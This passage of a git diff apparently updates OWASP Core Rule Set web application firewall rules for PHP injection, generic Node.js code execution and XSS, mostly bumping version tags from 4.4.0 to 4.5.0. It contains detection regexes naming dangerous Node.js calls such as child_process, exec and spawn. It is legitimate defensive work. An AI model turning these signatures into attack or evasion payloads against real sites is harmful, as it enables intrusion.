"id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ "id:933151,\ phase:2,\ @@ -241,7 +241,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.933151_matched_var=%{MATCHED_VAR}',\ setvar:'tx.933151_matched_var_name=%{MATCHED_VAR_NAME}',\ @@ -252,8 +252,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F SecRule TX:1 "@pmFromFile php-function-names-933151.data" \ "setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \ "id:933131,\ phase:2,\ @@ -269,7 +269,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -288,7 +288,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -307,7 +307,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -326,7 +326,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -345,10 +345,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" diff --git a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf index e8d2737..bbcae5b 100644 --- a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf +++ b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\x0b]+Function[\s\x0b]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\x0b]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\x0b]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ "id:934100,\ phase:2,\ @@ -25,7 +25,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -45,7 +45,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -65,7 +65,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1/180/77',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -86,7 +86,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -106,7 +106,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -126,12 +126,12 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\x0b]*\(" \ "id:934101,\ phase:2,\ @@ -148,7 +148,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -168,7 +168,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -188,12 +188,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC" diff --git a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf index 17cb32f..2c70f67 100644 --- a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf +++ b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \ "id:941010,\ phase:1,\ @@ -17,7 +17,7 @@ SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-12 nolog,\ tag:'OWASP_CRS',\ ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ "id:941100,\ phase:2,\ @@ -33,7 +33,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -53,7 +53,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -73,7 +73,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -93,7 +93,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -113,7 +113,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -133,7 +133,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -153,7 +153,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -173,7 +173,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -193,7 +193,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -213,7 +213,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -233,7 +233,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -253,7 +253,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -273,7 +273,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -293,7 +293,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -313,7 +313,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -333,7 +333,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -353,7 +353,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -373,7 +373,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -393,7 +393,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -413,7 +413,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \ @@ 